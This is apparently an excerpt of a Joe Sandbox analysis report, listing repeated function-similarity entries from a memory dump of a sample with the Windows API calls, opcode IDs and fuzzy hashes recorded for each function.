                                                                                                    • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                    • Instruction Fuzzy Hash: 89D06714B59606C7EA5C3F70785917992365F58B01FA41879D84B46397CD2CA80D8660
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                    • Instruction ID: 5d3803f92845211881e63d25be5c5f99ac52e72a5e15fca33c32aa2e28fcc336
                                                                                                    • Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                    • Instruction Fuzzy Hash: FB51DA61B09252CAF62DBE26B40067AE6B1BF44BB8FA44634DD7D47BD5CE3CD8019720
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7691B9CE5,?,?,00000000,00007FF7691B9D9A), ref: 00007FF7691B9ED6
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7691B9CE5,?,?,00000000,00007FF7691B9D9A), ref: 00007FF7691B9EE0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseErrorFindLastNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 1687624791-0
                                                                                                    • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                    • Instruction ID: a0043869fd1f88a6122e54dd6c9e6b79920fa177b9c3f9d4a6f96f98f6811713
                                                                                                    • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                    • Instruction Fuzzy Hash: D3218711F1C642C1FE987F61B59037DA6B35F947A4FB84235DA2E477D9CE6CA4418320
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                    • Instruction ID: edd4a2c957f701c729d504657b930d7a95042024010cfe5e7d82f6c8050b47bb
                                                                                                    • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                    • Instruction Fuzzy Hash: 99119161B18A91C1DA54AF26F884169B372BB44BF4FA84331EE7E47BE9CE7CD0508750
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                    • Instruction ID: 32ce4742f2c3880c45a5b0e5e16a1bdfc2d66e0da6f8150cd1ca27090b7cb1fa
                                                                                                    • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                    • Instruction Fuzzy Hash: 8241D332908201C7EA28AF15B59127DB3B2EB55B94FA40131D69E87AD8CF3CF502C760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 840049012-0
                                                                                                    • Opcode ID: d03e57727a3ddcd9b75824e7054145c13dfede08f3066f385c444dbc992ff91c
                                                                                                    • Instruction ID: 6f79cfd9432875a84dd3bbbc2d39a909d240b9ffa5eccfb5efc51e3e76127f0f
                                                                                                    • Opcode Fuzzy Hash: d03e57727a3ddcd9b75824e7054145c13dfede08f3066f385c444dbc992ff91c
                                                                                                    • Instruction Fuzzy Hash: 20219611F08651C5FA18BE96B5083BAE6A1BF45BD4FE84431EE0D07B8ACE7DE941C710
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                    • Instruction ID: 9347c6d57750f04b78ff00014c1fd94af4c5ce005d4ecfb38a6ce5a9ff26a639
                                                                                                    • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                    • Instruction Fuzzy Hash: B731A021A18662C2F759BF15E8413BDA6B2AB50BB0FE54135EA6D433E6CE7CE4418330
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3947729631-0
                                                                                                    • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                    • Instruction ID: 1b6e18f1b43ee7a29d32509c3ee8fbfb4a25623635a25c5396ca3e6c7b488ca3
                                                                                                    • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                    • Instruction Fuzzy Hash: F921A372A15706CAEB18AF64D4402EC73B1FB04B18FA40676D72C06AC9DF38E445C750
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                    • Instruction ID: 8f6c764ad0c2c361205613e3be5214f9477736449020e5de6b46a47b47f8833b
                                                                                                    • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                    • Instruction Fuzzy Hash: 32119621A1D681C1EA68BF51F41027EE276AF55B84FE44431EB4D976DECF3CD4418760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                    • Instruction ID: 50e037da462eef05f8da5eadccf0c6dbab9b3df4636b6385c7c54e1ae8a76312
                                                                                                    • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                    • Instruction Fuzzy Hash: BA21957261CA81C6DB65AF18F480379B6B1EB94B94FB44234E65D876D9DF3CD4408B10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                    • Instruction ID: 677ca383739298bc03a8737a6d36311b32d9978a54b1ba4cba70b212086619d7
                                                                                                    • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                    • Instruction Fuzzy Hash: 6701A921A08742C0E908FF566901069E6B5EB55FE0F984631DE6C13BDADE3CD8029710
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(?,?,?,00007FF7691AFFB0,?,?,?,00007FF7691B161A,?,?,?,?,?,00007FF7691B2E09), ref: 00007FF7691BC94A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                    • Instruction ID: 355f0ae6945eff8b08f54aa81d55d6ec4db1009abb077f67a4959e59eb23b2ee
                                                                                                    • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                    • Instruction Fuzzy Hash: 26F05800B18347C5FE5C7FA5785137992A25F99BA0FA84630982E862C9DE2CA4418230
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9
                                                                                                    • LoadLibraryW.KERNELBASE(?,00007FF7691A5C06,?,00007FF7691A308E), ref: 00007FF7691A81C2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharLibraryLoadMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2592636585-0
                                                                                                    • Opcode ID: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
                                                                                                    • Instruction ID: 9a6c2912fe4c7a683c2507ab742c4724babfea1c36b48739555120d39be4f816
                                                                                                    • Opcode Fuzzy Hash: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
                                                                                                    • Instruction Fuzzy Hash: F7D0C211F28281C1FA48BF77BA4657991629F89BC0FE8C034EE1D03B4ADC3CD0804B00
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: fcbdb7a3bb33d61edf12612711e3872dd56886a0f228ec4408bb52a4007a3dc4
                                                                                                    • Instruction ID: 2f2b7d533a0856b710204b72f12c7d61b30025331dba30678f31ea55bc7eccb7
                                                                                                    • Opcode Fuzzy Hash: fcbdb7a3bb33d61edf12612711e3872dd56886a0f228ec4408bb52a4007a3dc4
                                                                                                    • Instruction Fuzzy Hash: CAB01220FE540FC599083B75AC4E03010606764702FE01220C007C2190CC0C00DB4A10
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7A1B
                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7A9E
                                                                                                    • DeleteFileW.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7ABD
                                                                                                    • FindNextFileW.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7ACB
                                                                                                    • FindClose.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7ADC
                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7AE5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                    • String ID: %s\*
                                                                                                    • API String ID: 1057558799-766152087
                                                                                                    • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                    • Instruction ID: 37816defd342bae652e1769586292a74f9f788f8579f940ae5ec14237c27edfe
                                                                                                    • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                    • Instruction Fuzzy Hash: 46418221A0C542E5EA24BF64F4545B9A370FB94754FE40632D55E82AC8DF3CDB4ACB10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3140674995-0
                                                                                                    • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                    • Instruction ID: 70faa9552047ccec46d88eee84f0e92deb287a84e0b5bc372644f8dfe397ee10
                                                                                                    • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                    • Instruction Fuzzy Hash: 82311976609A81C6EB64AF64F8403EEB374FB84744F94403ADA4E46A95DF3CD548CB24
                                                                                                    APIs
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C4F55
                                                                                                      • Part of subcall function 00007FF7691C48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C48BC
                                                                                                      • Part of subcall function 00007FF7691B9C58: HeapFree.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
                                                                                                      • Part of subcall function 00007FF7691B9C58: GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78
                                                                                                      • Part of subcall function 00007FF7691B9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7691B9BEF,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691B9C19
                                                                                                      • Part of subcall function 00007FF7691B9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7691B9BEF,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691B9C3E
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C4F44
                                                                                                      • Part of subcall function 00007FF7691C4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C491C
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C51BA
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C51CB
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C51DC
                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7691C541C), ref: 00007FF7691C5203
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                    • String ID:
                                                                                                    • API String ID: 4070488512-0
                                                                                                    • Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                                    • Instruction ID: 93601a4186749160260b6781c6fdaa6d3b331dee78fc726bf11f7c6180fb29a1
                                                                                                    • Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                                    • Instruction Fuzzy Hash: 47D19F26A0C252C6EB28BF25F8511B9A7B1EF94784FE44135EA4D87686DF3CE441CB60
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
